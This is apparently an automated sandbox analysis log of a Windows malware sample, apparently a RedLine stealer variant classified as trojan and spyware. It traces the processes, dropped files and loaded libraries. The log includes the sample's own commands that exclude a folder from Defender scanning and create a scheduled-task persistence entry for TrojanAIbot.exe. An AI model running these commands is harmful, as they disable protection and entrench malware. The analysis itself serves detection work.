                        Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Native_Redline_BTC.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/170@173/23
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,2_2_04DFCBD0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\cfd441acea3434e2.binJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e2-inf
                        Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e29ea72c54-b
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e273779169-b
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeFile created: C:\Users\user\AppData\Local\Temp\vehiculationJump to behavior
                        Source: AENiBH7X1q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: AENiBH7X1q.exeReversingLabs: Detection: 45%
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeFile read: C:\Users\user\Desktop\AENiBH7X1q.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknownProcess created: C:\Users\user\Desktop\AENiBH7X1q.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                        Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                        Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                        Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                        Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                        Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                        Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                        Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                        Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                        Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                        Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                        Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                        Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                        Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                        Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
